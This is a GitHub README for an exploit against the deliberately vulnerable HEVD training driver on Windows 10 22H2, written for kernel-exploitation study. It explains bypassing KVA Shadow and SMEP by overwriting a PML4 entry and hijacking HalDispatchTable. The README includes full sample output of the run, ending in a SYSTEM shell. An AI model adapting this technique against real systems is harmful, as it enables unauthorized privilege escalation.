Skip to content

HEVD Exploit: ArbitraryWrite on Windows 10 22H2 - Bypassing KVA Shadow and SMEP via PML4 Entry Manipulation

Notifications You must be signed in to change notification settings

ommadawn46/HEVD-Exploit-Win10-22H2-KVAS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

HackSys Extreme Vulnerable Driver (HEVD) - Arbitrary Overwrite Exploit

Introduction

This repository contains an exploit for HackSys Extreme Vulnerable Driver (HEVD) that bypasses KVA Shadow, a mitigation for the Meltdown vulnerability.

Exploit Overview

The exploit leverages an Arbitrary Overwrite vulnerability in HEVD, modifying the PML4 entry to bypass both KVA Shadow and SMEP.

For a detailed explanation and walkthrough of this exploit, see my blog post: Windows Kernel Exploitation — HEVD on Windows 10 22H2.

Tested Environment

This exploit was tested in the following environment:

  • Windows 10 Version 22H2 (OS Build 19045.3930)
  • KVA Shadow: Enabled
  • VBS/HVCI: Disabled
  • Integrity Level: Medium

Sample Output

C:\Users\debuggee>HEVD_ArbitraryOverwrite.exe
HackSys Extreme Vulnerable Driver (HEVD) - Arbitrary Overwrite Exploit
Windows 10 Version 22H2 (OS Build 19045.3930) with KVA Shadow enabled
-----

[*] Executable shellcode: 000002846A110000
[+] HEVD device handle: 0000000000000098
[+] Kernel base address: FFFFF80560A00000
[+] NtQueryIntervalProfile: 00007FF8C704FA00

[*] Leaking virtual address of shellcode's PML4 entry...
[!] Writing: *(000000BF51BBFC60) = *(FFFFF80560C6B573)
[*] Leaked PTE virtual address: FFFF940000000000
[*] Extracted PML4 Self Reference Entry index: 128
[*] Extracted shellcode's PML4 index: 005
[*] Calculated virtual address for shellcode's PML4 entry: FFFF944A25128028

[*] Modifying shellcode's PML4 entry to bypass SMEP and KVA Shadow...
[!] Writing: *(000000BF51BBFC70) = *(FFFF944A25128028)
[*] Leaked shellcode's PML4 entry: 8A0000015F3D5867
[*] Modified shellcode's PML4 entry: 0A0000015F3D5863
[!] Writing: *(FFFF944A25128028) = *(000000BF51BBFCB8)
[*] Overwrote PML4 entry to make shellcode executable in kernel mode

[*] Modifying HalDispatchTable+0x8 for shellcode execution...
[!] Writing: *(000000BF51BBFC70) = *(FFFFF80561600A68)
[*] Leaked HalDispatchTable+0x8: FFFFF80561392EF0
[!] Writing: *(FFFFF80561600A68) = *(000000BF51BBFCE0)
[*] Overwrote HalDispatchTable+0x8 to gain control flow

[*] Executing shellcode...
[*] Executable SetR13 function allocated at: 000002846A240000
[*] Setting R13 to shellcode's address
[*] Calling NtQueryIntervalProfile to execute shellcode

[*] Restoring the kernel state...
[!] Writing: *(FFFF944A25128028) = *(000000BF51BBFCF8)
[!] Writing: *(FFFFF80561600A68) = *(000000BF51BBFD00)

[+] Spawning a shell with SYSTEM privilege
Microsoft Windows [Version 10.0.19045.3930]
(c) Microsoft Corporation. All rights reserved.

C:\Users\debuggee>whoami
nt authority\system

Build

To build the exploit, execute the following command in x64 Native Tools Command Prompt:

cl.exe HEVD_ArbitraryOverwrite.c

Verifying KVA Shadow Status

To verify if KVA Shadow is active on your system, use SpecuCheck:

C:\Users\debuggee>SpecuCheck.exe
SpecuCheck v1.1.1    --   Copyright(c) 2018 Alex Ionescu
https://ionescu007.github.io/SpecuCheck/  --   @aionescu
--------------------------------------------------------

Mitigations for CVE-2017-5754 [rogue data cache load]
--------------------------------------------------------
[-] Kernel VA Shadowing Enabled:                    yes
 ├───> Unnecessary due lack of CPU vulnerability:    no
 ├───> With User Pages Marked Global:                no
 ├───> With PCID Support:                           yes
 └───> With PCID Flushing Optimization (INVPCID):   yes
...

Disclaimer

This code is provided for educational purposes only. Use it responsibly and only on systems you have permission to test.

About

HEVD Exploit: ArbitraryWrite on Windows 10 22H2 - Bypassing KVA Shadow and SMEP via PML4 Entry Manipulation

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published